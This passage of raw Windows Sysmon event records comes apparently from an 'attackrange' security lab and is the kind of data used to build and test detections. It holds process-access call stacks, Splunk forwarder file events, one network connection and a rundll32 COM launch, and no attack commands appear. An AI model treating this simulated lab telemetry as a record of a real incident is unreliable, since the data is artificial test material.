licyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x8000000000000000149544Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:46.397{39BD8DE3-0F64-60CA-0C00-00000000D101}7201984C:\Windows\system32\svchost.exe{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12141|C:\Windows\SYSTEM32\psmserviceexthost.dll+170e8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149663Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:47.985{39BD8DE3-0FD7-60CA-7D00-00000000D101}2100104C:\Windows\system32\csrss.exe{39BD8DE3-7093-60CA-050D-00000000D101}5488C:\Windows\System32\rundll32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000149662Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:47.985{39BD8DE3-0F63-60CA-0500-00000000D101}408424C:\Windows\system32\csrss.exe{39BD8DE3-7093-60CA-050D-00000000D101}5488C:\Windows\System32\rundll32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000149661Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:47.985{39BD8DE3-0F64-60CA-0C00-00000000D101}7206400C:\Windows\system32\svchost.exe{39BD8DE3-7093-60CA-050D-00000000D101}5488C:\Windows\System32\rundll32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+36349|c:\windows\system32\rpcss.dll+3bb32|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149660Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:47.985{39BD8DE3-0F64-60CA-0C00-00000000D101}7201984C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149659Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:47.985{39BD8DE3-0F64-60CA-0C00-00000000D101}7201984C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149658Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:47.985{39BD8DE3-0F64-60CA-0C00-00000000D101}7201984C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149657Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:47.985{39BD8DE3-0F64-60CA-0C00-00000000D101}7201984C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000149656Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:47.979{39BD8DE3-7093-60CA-050D-00000000D101}5488C:\Windows\System32\rundll32.exe10.0.14393.4169 (rs1_release.210107-1130)Windows host process (Rundll32)Microsoft® Windows® Operating SystemMicrosoft CorporationRUNDLL32.EXEC:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {c82192ee-6cb5-4bc0-9ef0-fb818773790a} -EmbeddingC:\Windows\system32\WIN-HOST-14\Administrator{39BD8DE3-0FD9-60CA-F738-070000000000}0x738f72HighMD5=23DB802097F7B7E520E40068A7E68B14,SHA256=28DE7D3E8BF4B19E44063A4BFC2E7C30AE488CD9A1F63320ED374E14AAECA667,IMPHASH=7D1CE1BAFE48B63D9D19E8E0E5DF3E6C{39BD8DE3-0F64-60CA-0C00-00000000D101}720C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x8000000000000000149655Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:47.963{39BD8DE3-0FD9-60CA-8400-00000000D101}37206492C:\Windows\System32\RuntimeBroker.exe{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+182c9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+4cd20|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x8000000000000000149654Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:47.963{39BD8DE3-0FD9-60CA-8400-00000000D101}37206492C:\Windows\System32\RuntimeBroker.exe{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+182c9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+4cd20|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x8000000000000000149653Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:47.963{39BD8DE3-0FD9-60CA-8400-00000000D101}37206492C:\Windows\System32\RuntimeBroker.exe{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+18280|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+4cd20|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x8000000000000000149652Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:47.963{39BD8DE3-0FD9-60CA-8400-00000000D101}37206088C:\Windows\System32\RuntimeBroker.exe{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+17f26|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a752|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a87f|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a26c|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 10341000x8000000000000000149651Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:47.963{39BD8DE3-0FD9-60CA-8400-00000000D101}37206088C:\Windows\System32\RuntimeBroker.exe{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+17f26|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a752|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a87f|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a26c|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 23542300x8000000000000000149650Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:47.901{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E63A6ED2597B352AC3ACCB7C5878F04E,SHA256=2CB5121F3625B42340C5ED02DF2510CEDC335E7356278F25D3A0CEF2A78395E0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000149649Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:47.349{39BD8DE3-0FD9-60CA-8400-00000000D101}37206492C:\Windows\System32\RuntimeBroker.exe{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+3d38b|C:\Windows\System32\combase.dll+3e7b2|C:\Windows\System32\combase.dll+63ae3|C:\Windows\System32\combase.dll+3e8cd|C:\Windows\System32\combase.dll+61e6f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x8000000000000000149648Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:47.349{39BD8DE3-0FD9-60CA-8400-00000000D101}37206492C:\Windows\System32\RuntimeBroker.exe{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+3d38b|C:\Windows\System32\combase.dll+3e7b2|C:\Windows\System32\combase.dll+63ae3|C:\Windows\System32\combase.dll+3e8cd|C:\Windows\System32\combase.dll+61e6f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x8000000000000000149647Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:47.346{39BD8DE3-0FD9-60CA-8400-00000000D101}37206088C:\Windows\System32\RuntimeBroker.exe{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1535|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16ef|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a243|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7 23542300x8000000000000000149646Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:47.067{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=91FC334216C0C08EA162543FDF359B3E,SHA256=544FE192C057BBF271395CD84BEC6A17AD17959DBD67D281411F099F6655C9DD,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000104536Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:43:46.787{54715871-FD33-60C9-6D00-00000000CF01}3756C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-681.attackrange.local55386-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000104535Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:43:48.165{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=40877AE323832340BEEFB3F8D47F591D,SHA256=3304EF6BD67F071D35226A69CD35273B5CA22AE523E8C91A6EE00357C15F6ACE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000149837Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.735{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E6F3B5578089B283E7C5B59AB47926CE,SHA256=53120C85CAD28A75152E1B3D4BA0692A07C6D237854D697D30E4F5E4034BA2CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000149836Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.565{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-7094-60CA-070D-00000000D101}5324C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149835Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.565{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-7094-60CA-070D-00000000D101}5324C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149834Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.565{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-7094-60CA-060D-00000000D101}5472C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149833Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 